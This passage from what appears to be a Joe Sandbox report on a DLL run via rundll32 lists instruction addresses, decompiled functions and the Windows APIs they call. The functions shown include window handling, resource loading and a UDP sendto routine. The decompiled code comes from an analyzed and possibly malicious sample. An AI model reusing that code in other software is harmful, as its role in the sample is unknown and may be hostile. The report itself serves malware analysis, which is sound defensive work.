                                                                                                        0x100223dd
                                                                                                        0x100223e0
                                                                                                        0x100223e6
                                                                                                        0x10022459
                                                                                                        0x00000000
                                                                                                        0x100223ed
                                                                                                        0x100223ed
                                                                                                        0x100223f0
                                                                                                        0x1002240b
                                                                                                        0x1002240e
                                                                                                        0x1002242e
                                                                                                        0x10022440
                                                                                                        0x10022410
                                                                                                        0x10022410
                                                                                                        0x10022413
                                                                                                        0x00000000
                                                                                                        0x10022415
                                                                                                        0x10022427
                                                                                                        0x10022427
                                                                                                        0x10022413
                                                                                                        0x1002245e
                                                                                                        0x10022462
                                                                                                        0x100223f2
                                                                                                        0x1002240a
                                                                                                        0x1002240a
                                                                                                        0x100223f0

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                        • String ID:
                                                                                                        • API String ID: 3016257755-0
                                                                                                        • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                        • Instruction ID: 8dbc0b72f00ea763734ae0c8b1a7260823f108f727578f4f2c9ad294c4834352
                                                                                                        • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                        • Instruction Fuzzy Hash: 4201287A40014ABBCF12AEC4EC41CEE3F66FB18294B958515FE1858531D236D9B2AB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 96%
                                                                                                        			E1000FE47(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct HWND__* _t9;
                                                                                                        				struct HWND__* _t10;
                                                                                                        				void* _t14;
                                                                                                        				void* _t15;
                                                                                                        				struct HWND__* _t16;
                                                                                                        				struct HWND__* _t17;
                                                                                                        				void* _t18;
                                                                                                        
                                                                                                        				_t14 = __ecx;
                                                                                                        				_t13 = __ebx;
                                                                                                        				_t9 = GetDlgItem(_a4, _a8);
                                                                                                        				_t15 = GetTopWindow;
                                                                                                        				_t16 = _t9;
                                                                                                        				if(_t16 == 0) {
                                                                                                        					L6:
                                                                                                        					_t10 = GetTopWindow(_a4);
                                                                                                        					while(1) {
                                                                                                        						_t17 = _t10;
                                                                                                        						__eflags = _t17;
                                                                                                        						if(_t17 == 0) {
                                                                                                        							goto L10;
                                                                                                        						}
                                                                                                        						_t10 = E1000FE47(_t13, _t14, _t17, _a8, _a12);
                                                                                                        						__eflags = _t10;
                                                                                                        						if(_t10 == 0) {
                                                                                                        							_t10 = GetWindow(_t17, 2);
                                                                                                        							continue;
                                                                                                        						}
                                                                                                        						goto L10;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					if(GetTopWindow(_t16) == 0) {
                                                                                                        						L3:
                                                                                                        						_push(_t16);
                                                                                                        						if(_a12 == 0) {
                                                                                                        							return E1000FB5C(_t13, _t14, _t18);
                                                                                                        						}
                                                                                                        						_t10 = E1000FB83(_t14, _t15, _t16, __eflags);
                                                                                                        						__eflags = _t10;
                                                                                                        						if(_t10 == 0) {
                                                                                                        							goto L6;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t10 = E1000FE47(__ebx, _t14, _t16, _a8, _a12);
                                                                                                        						if(_t10 == 0) {
                                                                                                        							goto L3;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L10:
                                                                                                        				return _t10;
                                                                                                        			}













                                                                                                        0x1000fe47
                                                                                                        0x1000fe47
                                                                                                        0x1000fe52
                                                                                                        0x1000fe58
                                                                                                        0x1000fe5e
                                                                                                        0x1000fe62
                                                                                                        0x1000fe92
                                                                                                        0x1000fe95
                                                                                                        0x1000feb2
                                                                                                        0x1000feb2
                                                                                                        0x1000feb4
                                                                                                        0x1000feb6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000fea0
                                                                                                        0x1000fea5
                                                                                                        0x1000fea7
                                                                                                        0x1000feac
                                                                                                        0x00000000
                                                                                                        0x1000feac
                                                                                                        0x00000000
                                                                                                        0x1000fea7
                                                                                                        0x1000fe64
                                                                                                        0x1000fe69
                                                                                                        0x1000fe7b
                                                                                                        0x1000fe7f
                                                                                                        0x1000fe80
                                                                                                        0x00000000
                                                                                                        0x1000fe82
                                                                                                        0x1000fe89
                                                                                                        0x1000fe8e
                                                                                                        0x1000fe90
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000fe6b
                                                                                                        0x1000fe72
                                                                                                        0x1000fe79
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000fe79
                                                                                                        0x1000fe69
                                                                                                        0x1000febb
                                                                                                        0x1000febb

                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32 ref: 1000FE52
                                                                                                        • GetTopWindow.USER32(00000000), ref: 1000FE65
                                                                                                          • Part of subcall function 1000FE47: GetWindow.USER32(00000000,00000002), ref: 1000FEAC
                                                                                                        • GetTopWindow.USER32(?), ref: 1000FE95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Item
                                                                                                        • String ID:
                                                                                                        • API String ID: 369458955-0
                                                                                                        • Opcode ID: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
                                                                                                        • Instruction ID: 3243c1bb31c4da8a8ed3b9d60ce207d24ba739ee5e1db1414c8eeda74806f304
                                                                                                        • Opcode Fuzzy Hash: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
                                                                                                        • Instruction Fuzzy Hash: 07018F374016AAB7EB229F60CC00AAF3A98EF447D0F018018FD049153AD731DA12BAA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 89%
                                                                                                        			E1001D6BC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				signed int _t15;
                                                                                                        				LONG* _t21;
                                                                                                        				long _t23;
                                                                                                        				void* _t31;
                                                                                                        				LONG* _t33;
                                                                                                        				void* _t34;
                                                                                                        				void* _t35;
                                                                                                        
                                                                                                        				_t35 = __eflags;
                                                                                                        				_t29 = __edx;
                                                                                                        				_t25 = __ebx;
                                                                                                        				_push(0xc);
                                                                                                        				_push(0x1002fae0);
                                                                                                        				E1001984C(__ebx, __edi, __esi);
                                                                                                        				_t31 = E1001BF79(__edx, __edi, _t35);
                                                                                                        				_t15 =  *0x1005826c; // 0xfffffffe
                                                                                                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                        					E1001A549(0xd);
                                                                                                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                        					 *(_t34 - 0x1c) = _t33;
                                                                                                        					__eflags = _t33 -  *0x10058170; // 0x2e41308
                                                                                                        					if(__eflags != 0) {
                                                                                                        						__eflags = _t33;
                                                                                                        						if(_t33 != 0) {
                                                                                                        							_t23 = InterlockedDecrement(_t33);
                                                                                                        							__eflags = _t23;
                                                                                                        							if(_t23 == 0) {
                                                                                                        								__eflags = _t33 - 0x10057d48;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									_push(_t33);
                                                                                                        									E10016380(_t25, _t31, _t33, __eflags);
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t21 =  *0x10058170; // 0x2e41308
                                                                                                        						 *(_t31 + 0x68) = _t21;
                                                                                                        						_t33 =  *0x10058170; // 0x2e41308
                                                                                                        						 *(_t34 - 0x1c) = _t33;
                                                                                                        						InterlockedIncrement(_t33);
                                                                                                        					}
                                                                                                        					 *(_t34 - 4) = 0xfffffffe;
                                                                                                        					E1001D757();
                                                                                                        				} else {
                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                        				}
                                                                                                        				if(_t33 == 0) {
                                                                                                        					E10017DA6(_t25, _t29, _t31, 0x20);
                                                                                                        				}
                                                                                                        				return E10019891(_t33);
                                                                                                        			}










                                                                                                        0x1001d6bc
                                                                                                        0x1001d6bc
                                                                                                        0x1001d6bc
                                                                                                        0x1001d6bc
                                                                                                        0x1001d6be
                                                                                                        0x1001d6c3
                                                                                                        0x1001d6cd
                                                                                                        0x1001d6cf
                                                                                                        0x1001d6d7
                                                                                                        0x1001d6f8
                                                                                                        0x1001d6fe
                                                                                                        0x1001d702
                                                                                                        0x1001d705
                                                                                                        0x1001d708
                                                                                                        0x1001d70e
                                                                                                        0x1001d710
                                                                                                        0x1001d712
                                                                                                        0x1001d715
                                                                                                        0x1001d71b
                                                                                                        0x1001d71d
                                                                                                        0x1001d71f
                                                                                                        0x1001d725
                                                                                                        0x1001d727
                                                                                                        0x1001d728
                                                                                                        0x1001d72d
                                                                                                        0x1001d725
                                                                                                        0x1001d71d
                                                                                                        0x1001d72e
                                                                                                        0x1001d733
                                                                                                        0x1001d736
                                                                                                        0x1001d73c
                                                                                                        0x1001d740
                                                                                                        0x1001d740
                                                                                                        0x1001d746
                                                                                                        0x1001d74d
                                                                                                        0x1001d6df
                                                                                                        0x1001d6df
                                                                                                        0x1001d6df
                                                                                                        0x1001d6e4
                                                                                                        0x1001d6e8
                                                                                                        0x1001d6ed
                                                                                                        0x1001d6f5

                                                                                                        APIs
                                                                                                          • Part of subcall function 1001BF79: __getptd_noexit.LIBCMT ref: 1001BF7A
                                                                                                          • Part of subcall function 1001BF79: __amsg_exit.LIBCMT ref: 1001BF87
                                                                                                        • __amsg_exit.LIBCMT ref: 1001D6E8
                                                                                                        • __lock.LIBCMT ref: 1001D6F8
                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 1001D715
                                                                                                        • InterlockedIncrement.KERNEL32(02E41308), ref: 1001D740
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2880340415-0
                                                                                                        • Opcode ID: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
                                                                                                        • Instruction ID: ba7e7af5003a78fddfad0021ce05134b2f36e9a59f0d2c47ef46babd1389d2ef
                                                                                                        • Opcode Fuzzy Hash: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
                                                                                                        • Instruction Fuzzy Hash: 95016D39904A21EBEB41FB65988679D77A4FF05790F11410AE804AF291DB34E9C2CB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100126F9(void* __ecx, CHAR* _a4) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct HRSRC__* _t8;
                                                                                                        				void* _t9;
                                                                                                        				void* _t11;
                                                                                                        				void* _t14;
                                                                                                        				void* _t15;
                                                                                                        				void* _t16;
                                                                                                        				struct HINSTANCE__* _t17;
                                                                                                        				void* _t18;
                                                                                                        
                                                                                                        				_t14 = 0;
                                                                                                        				_t11 = 0;
                                                                                                        				_t19 = _a4;
                                                                                                        				_t18 = __ecx;
                                                                                                        				if(_a4 == 0) {
                                                                                                        					L4:
                                                                                                        					_t16 = E100122B0(_t11, _t18, _t11);
                                                                                                        					if(_t11 != 0 && _t14 != 0) {
                                                                                                        						FreeResource(_t14);
                                                                                                        					}
                                                                                                        					return _t16;
                                                                                                        				}
                                                                                                        				_t17 =  *(E1000D5EC(0, 0, _t15, _t19) + 0xc);
                                                                                                        				_t8 = FindResourceA(_t17, _a4, 0xf0);
                                                                                                        				if(_t8 == 0) {
                                                                                                        					goto L4;
                                                                                                        				}
                                                                                                        				_t9 = LoadResource(_t17, _t8);
                                                                                                        				_t14 = _t9;
                                                                                                        				if(_t14 != 0) {
                                                                                                        					_t11 = LockResource(_t14);
                                                                                                        					goto L4;
                                                                                                        				}
                                                                                                        				return _t9;
                                                                                                        			}















                                                                                                        0x100126fd
                                                                                                        0x100126ff
                                                                                                        0x10012701
                                                                                                        0x10012705
                                                                                                        0x10012707
                                                                                                        0x1001273c
                                                                                                        0x10012746
                                                                                                        0x10012748
                                                                                                        0x1001274f
                                                                                                        0x1001274f
                                                                                                        0x00000000
                                                                                                        0x10012755
                                                                                                        0x1001270e
                                                                                                        0x1001271b
                                                                                                        0x10012723
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10012727
                                                                                                        0x1001272d
                                                                                                        0x10012731
                                                                                                        0x1001273a
                                                                                                        0x00000000
                                                                                                        0x1001273a
                                                                                                        0x1001275b

                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(?,?,000000F0), ref: 1001271B
                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012727
                                                                                                        • LockResource.KERNEL32(00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012734
                                                                                                        • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 1001274F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindFreeLoadLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1078018258-0
                                                                                                        • Opcode ID: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
                                                                                                        • Instruction ID: 32ecfa8a0ceb179aec2dc768c20ccd4f8790d9104fa4174b83ef058a4c527ff5
                                                                                                        • Opcode Fuzzy Hash: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
                                                                                                        • Instruction Fuzzy Hash: 54F090762042226FA3019B675C88A3BB7ECEFC55E2B110039FE04D6291EE35CC629771
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 25%
                                                                                                        			E10001360(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                        				signed int _v8;
                                                                                                        				short _v20;
                                                                                                        				short _v22;
                                                                                                        				char _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				signed int _t15;
                                                                                                        				short _t18;
                                                                                                        				intOrPtr _t31;
                                                                                                        				signed int _t33;
                                                                                                        
                                                                                                        				_t15 =  *0x10057a08; // 0xef7d8b91
                                                                                                        				_v8 = _t15 ^ _t33;
                                                                                                        				_v28 = __ecx;
                                                                                                        				_t18 = E100174D0(_t31,  &_v24, 0, 0x10);
                                                                                                        				_v24 = 2;
                                                                                                        				__imp__#11(_a4);
                                                                                                        				_v20 = _t18;
                                                                                                        				__imp__#9(_a8);
                                                                                                        				_v22 = _t18;
                                                                                                        				__imp__#20(_a12, _a16, 0,  &_v24, 0x10);
                                                                                                        				return E100167D5(_v28, __ebx, _v8 ^ _t33, _a12, _t31, __esi,  *((intOrPtr*)(_v28 + 0x24)));
                                                                                                        			}












                                                                                                        0x10001366
                                                                                                        0x1000136d
                                                                                                        0x10001370
                                                                                                        0x1000137b
                                                                                                        0x10001383
                                                                                                        0x1000138d
                                                                                                        0x10001393
                                                                                                        0x1000139b
                                                                                                        0x100013a1
                                                                                                        0x100013bc
                                                                                                        0x100013cf

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 1000137B
                                                                                                        • inet_addr.WS2_32(?), ref: 1000138D
                                                                                                        • htons.WS2_32(?), ref: 1000139B
                                                                                                        • sendto.WS2_32(?,?,00000002,00000000,00000002,00000010), ref: 100013BC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memsethtonsinet_addrsendto
                                                                                                        • String ID:
                                                                                                        • API String ID: 1158618643-0
                                                                                                        • Opcode ID: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
                                                                                                        • Instruction ID: 4ca8e198367322d4385a70dad1c3d41f0382a071c465ebc2c9307440f54d584b
                                                                                                        • Opcode Fuzzy Hash: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
                                                                                                        • Instruction Fuzzy Hash: D0017CB590020DABDB00DFA4CC86EAE77B8FF48300F104419F905AB281EB70AA40DBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000CCD3() {
                                                                                                        				intOrPtr _t16;
                                                                                                        				struct HWND__* _t19;
                                                                                                        				intOrPtr _t23;
                                                                                                        				intOrPtr* _t28;
                                                                                                        				void* _t29;
                                                                                                        
                                                                                                        				_t28 =  *((intOrPtr*)(_t29 - 0x20));
                                                                                                        				_t23 =  *((intOrPtr*)(_t29 - 0x24));
                                                                                                        				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
                                                                                                        					E10012913(_t23, 1);
                                                                                                        				}
                                                                                                        				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
                                                                                                        					EnableWindow( *(_t29 - 0x14), 1);
                                                                                                        				}
                                                                                                        				if( *(_t29 - 0x14) != 0) {
                                                                                                        					_t19 = GetActiveWindow();
                                                                                                        					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
                                                                                                        					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
                                                                                                        						SetActiveWindow( *(_t29 - 0x14));
                                                                                                        					}
                                                                                                        				}
                                                                                                        				 *((intOrPtr*)( *_t28 + 0x60))();
                                                                                                        				E1000C6E6(_t23, _t28, 0, _t28, _t34);
                                                                                                        				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
                                                                                                        					FreeResource( *(_t29 - 0x18));
                                                                                                        				}
                                                                                                        				_t16 =  *((intOrPtr*)(_t28 + 0x44));
                                                                                                        				return E10017C60(_t16);
                                                                                                        			}








                                                                                                        0x1000ccd3
                                                                                                        0x1000ccd6
                                                                                                        0x1000ccde
                                                                                                        0x1000cce4
                                                                                                        0x1000cce4
                                                                                                        0x1000ccec
                                                                                                        0x1000ccf3
                                                                                                        0x1000ccf3
                                                                                                        0x1000ccfc
                                                                                                        0x1000ccfe
                                                                                                        0x1000cd04
                                                                                                        0x1000cd07
                                                                                                        0x1000cd0c
                                                                                                        0x1000cd0c
                                                                                                        0x1000cd07
                                                                                                        0x1000cd16
                                                                                                        0x1000cd1b
                                                                                                        0x1000cd23
                                                                                                        0x1000cd28
                                                                                                        0x1000cd28
                                                                                                        0x1000cd2e
                                                                                                        0x1000cd36

                                                                                                        APIs
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 1000CCF3
                                                                                                        • GetActiveWindow.USER32 ref: 1000CCFE
                                                                                                        • SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,EF7D8B91), ref: 1000CD0C
                                                                                                        • FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,EF7D8B91), ref: 1000CD28
                                                                                                          • Part of subcall function 10012913: EnableWindow.USER32(?,EF7D8B91), ref: 10012920
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ActiveEnable$FreeResource
                                                                                                        • String ID:
                                                                                                        • API String ID: 253586258-0
                                                                                                        • Opcode ID: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
                                                                                                        • Instruction ID: b9d50a594c6b72ab84edc47d27728691b22d7b2ae70339502ef362fb55dd66ce
                                                                                                        • Opcode Fuzzy Hash: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
                                                                                                        • Instruction Fuzzy Hash: 97F04F3890071DDBEF12DB64C98599DBBF2FF48781B60002AE442722A5CB326D81DF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 76%
                                                                                                        			E1000AD21(void* __ecx) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v16;
                                                                                                        				char _v18;
                                                                                                        				char _v280;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t11;
                                                                                                        				long _t14;
                                                                                                        				intOrPtr _t15;
                                                                                                        				char* _t18;
                                                                                                        				intOrPtr _t21;
                                                                                                        				intOrPtr _t33;
                                                                                                        				signed int _t36;
                                                                                                        
                                                                                                        				_t11 =  *0x10057a08; // 0xef7d8b91
                                                                                                        				_v8 = _t11 ^ _t36;
                                                                                                        				_t35 = 0x104;
                                                                                                        				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
                                                                                                        				if(_t14 == 0 || _t14 == 0x104) {
                                                                                                        					L4:
                                                                                                        					_t15 = 0;
                                                                                                        					__eflags = 0;
                                                                                                        				} else {
                                                                                                        					_t18 = PathFindExtensionA( &_v280);
                                                                                                        					_t35 = "%s.dll";
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsw");
                                                                                                        					_t32 =  &_v280;
                                                                                                        					_t41 = _t18 -  &_v280 + 7 - 0x106;
                                                                                                        					asm("movsb");
                                                                                                        					_t33 = _t33;
                                                                                                        					if(_t18 -  &_v280 + 7 > 0x106) {
                                                                                                        						goto L4;
                                                                                                        					} else {
                                                                                                        						E1000A7B3(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
                                                                                                        						_t15 = E1000AA3A(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return E100167D5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
                                                                                                        			}

















                                                                                                        0x1000ad2a
                                                                                                        0x1000ad31
                                                                                                        0x1000ad37
                                                                                                        0x1000ad47
                                                                                                        0x1000ad4f
                                                                                                        0x1000ada6
                                                                                                        0x1000ada6
                                                                                                        0x1000ada6
                                                                                                        0x1000ad55
                                                                                                        0x1000ad5d
                                                                                                        0x1000ad63
                                                                                                        0x1000ad6b
                                                                                                        0x1000ad6c
                                                                                                        0x1000ad70
                                                                                                        0x1000ad7b
                                                                                                        0x1000ad81
                                                                                                        0x1000ad82
                                                                                                        0x1000ad83
                                                                                                        0x00000000
                                                                                                        0x1000ad85
                                                                                                        0x1000ad90
                                                                                                        0x1000ad9f
                                                                                                        0x1000ad9f
                                                                                                        0x1000ad83
                                                                                                        0x1000adb4

                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000AD47
                                                                                                        • PathFindExtensionA.SHLWAPI(?), ref: 1000AD5D
                                                                                                          • Part of subcall function 1000A7B3: _strcpy_s.LIBCMT ref: 1000A7BF
                                                                                                          • Part of subcall function 1000AA3A: __EH_prolog3.LIBCMT ref: 1000AA59
                                                                                                          • Part of subcall function 1000AA3A: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
                                                                                                          • Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
                                                                                                          • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
                                                                                                          • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
                                                                                                          • Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
                                                                                                          • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
                                                                                                          • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
                                                                                                          • Part of subcall function 1000AA3A: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                        • String ID: %s.dll
